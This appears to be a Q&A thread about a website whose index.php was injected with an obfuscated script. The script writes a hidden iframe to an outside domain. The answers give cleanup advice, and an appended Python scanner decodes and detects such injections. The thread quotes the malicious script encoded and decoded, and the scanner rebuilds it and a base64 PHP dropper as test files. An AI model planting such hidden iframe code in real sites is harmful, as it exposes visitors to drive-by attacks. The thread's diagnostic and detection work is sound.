Hi

The index.php file of my website has been affected by a script which is given below. Because of this, Google has banned me from accessing. Somebody please tell me what kind of attack this is and whether there is any solution.

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%30%36%36%37%31%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

FWIW, the unencoded version of the above is

eval(document.write('<iframe src="http://podfer.com/?5066718" width=1 height=1></iframe>'));

thanks and regards

tismon

+1  A: 

Sounds like this: link text

From the limited information you posted, I can almost guarantee that you're running some sort of open-source software on that site. Maybe not on the exact site that's affected, but there's probably some on the server, and it's also not likely patched up to current standards. I've seen it happen with phpBB, Joomla (especially Joomla), phpMyAdmin, and WordPress. It's almost scary common and 99% of the time is nowhere near as sophisticated as many think it might be. It happened to me on a very old test install of Mambo and at work with a rogue install of phpBB that someone on the IT staff snuck on the server to communicate with their fantasy football league.

Thing is, hackers are lazy. Unless you've got something they really want, there's no reason for them to go and hack you individually; it's not worth their time. However, if you're running a common piece of code with an exploitable codebase, they can scan sites for it at random, and when they find the hole, attack automatically. Hence the reason the code will be identical in content and location nearly all the time.

Park the site: put up an "under construction" page. Pull your code down and scrub it, whether by hand or automated. Now stop! Update all open source code, no matter how recent it might be. Now do sanity checks on permissions, SQL queries (especially search boxes that aren't escaped) and user permission systems. Run script injection tests. Finally, once it's all cleared to the best of your ability, test, test, test. Finally, though it likely had little to do with the problem, change your password and use a good password strategy to protect it.

Good luck. Be careful!

bpeterson76
@bpeterson76, @Alexander Sagen, @ring0 thanks a lot for replying. I am currently checking all the pages and removing the scripts manually.
tismon
It's not really related to open source or not. The very spotty history of IIS and IE shows that closed source software is equally vulnerable to various attacks.
Alex JL
Alex, true that. Just seems to hit open source much more because the code is out there to be hacked. Our only recourse is to implement the patches that the community does a great job of doing. But I bet out of 15 open-source based sites I've got knowledge of (run by friends, coworkers, acquaintances) only 10 have recently applied the necessary patches to stay safe, and that's a huge problem in my book. As for Microsoft and IE especially, it's a miracle that IE6 was never classified "spyware" due to the laundry list of holes it had.
bpeterson76
A: 

What bpeterson76 said, but also:

If it is true that you're not running any common software on your system, I'd first check your own scripts, especially if you're doing any writing to the filesystem anywhere. But it might also be outdated server software like Apache or what have you which exposes a security hole. It's not likely to be SQL injection, as data has been added to your files.

Depending on your hosting, either update all your server software, or ask your hosting provider.

Do you have any logs? A good look at them might reveal the hole. If you're on shared hosting, on some setups other customers can write to your files if your file permissions are too permissive.

Alexander Sagen
A: 

I actually had a similar attack on my sites not too long ago. First off, check the folders under your web root for PHP files named after functions. Mine were opendir, iswritable, etc. You should see more base64 encoded script in those files. If you don't, it may be unrelated. In any case, the who.is record for podfer.com has some info on it. Contact the hosting company of that website and tell them it's launching CSS attacks; they should shut him down without too much trouble. I got the hacker that effed with me that way.

Also, if you are using Mosso/Rackspace, you should go in and tighten up your file permissions.

Mike
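The two checks this thread walks through by hand, decoding the question's eval(unescape('%..')) payload to see which host the hidden iframe points at, and sweeping the folders under the web root for eval(base64_decode('..')) droppers as Mike's answer suggests, as an added example in Python. This is not code from any post in the thread. The percent-encoded string is the one from the question; the scanned file extensions, the sample file names (index.php, images/iswritable.php, about.html) and the dropper body are assumptions constructed for the example.

```python
import base64
import re
import tempfile
import urllib.parse
from pathlib import Path

# Obfuscated JavaScript of the shape in the question: eval(unescape('%XX%XX...'))
JS_UNESCAPE_RE = re.compile(r"eval\(\s*unescape\(\s*'([^']+)'\s*\)\s*\)", re.IGNORECASE)
# PHP droppers of the shape eval(base64_decode('...')), as Mike's answer describes
PHP_B64_RE = re.compile(
    r"eval\(\s*base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)", re.IGNORECASE)
# The src of any iframe the decoded payload writes, so the injected host can be reported
IFRAME_SRC_RE = re.compile(r"<iframe[^>]*\bsrc=[\"']?([^\"'\s>]+)", re.IGNORECASE)
# File types worth scanning: an assumption for this example, adjust to your site
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}

# The exact percent-encoded payload posted in the question
QUESTION_PAYLOAD = (
    "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63"
    "%3D%22%68%74%74%70%3A%2F%2F%70%6F%64%66%65%72%2E%63%6F%6D%2F%3F%35%30%36%36%37%31"
    "%38%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D"
    "%65%3E%27%29")


def decode_unescape(payload: str) -> str:
    """Reproduce JavaScript unescape(): %uXXXX sequences first, then ordinary %XX."""
    payload = re.sub(r"%u([0-9A-Fa-f]{4})",
                     lambda m: chr(int(m.group(1), 16)), payload)
    return urllib.parse.unquote(payload)


def find_injections(text: str) -> list:
    """Return (kind, decoded_payload, iframe_src) for every obfuscated eval() in text."""
    findings = []
    for m in JS_UNESCAPE_RE.finditer(text):
        decoded = decode_unescape(m.group(1))
        src = IFRAME_SRC_RE.search(decoded)
        findings.append(("js-unescape", decoded, src.group(1) if src else None))
    for m in PHP_B64_RE.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError: the argument is not real base64
            decoded = "<undecodable>"
        src = IFRAME_SRC_RE.search(decoded)
        findings.append(("php-base64", decoded, src.group(1) if src else None))
    return findings


def scan_webroot(root) -> dict:
    """Walk a web root recursively; map each file containing an injection to its findings."""
    root = Path(root)
    results = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        found = find_injections(path.read_text(encoding="utf-8", errors="replace"))
        if found:
            results[path.relative_to(root).as_posix()] = found
    return results


def build_sample_webroot() -> Path:
    """Constructed sample: the question's script appended to index.php, a dropper named
    after a PHP function in a subfolder (Mike's pattern), and a clean page."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_text(
        "<?php include 'header.php'; ?>\n<p>Welcome</p>\n"
        "<script>eval(unescape('" + QUESTION_PAYLOAD + "'));</script><!-- uy7gdr5332rkmn -->\n")
    (root / "images").mkdir()
    dropper_body = 'echo \'<iframe src="http://podfer.com/?5066718" width=1 height=1></iframe>\';'
    b64 = base64.b64encode(dropper_body.encode()).decode()
    (root / "images" / "iswritable.php").write_text("<?php eval(base64_decode('" + b64 + "')); ?>\n")
    (root / "about.html").write_text("<html><body>Nothing to see here</body></html>\n")
    return root


if __name__ == "__main__":
    for name, findings in scan_webroot(build_sample_webroot()).items():
        for kind, decoded, src in findings:
            print(f"{name}: {kind} -> iframe src {src}\n    {decoded}")
```

Running the module prints index.php and images/iswritable.php, both resolving to the same iframe URL, while about.html is silent; pointing scan_webroot at a real document root gives the list of files to clean and the host to report, which is the information the thread's answers ask the questioner to gather before rebuilding the site.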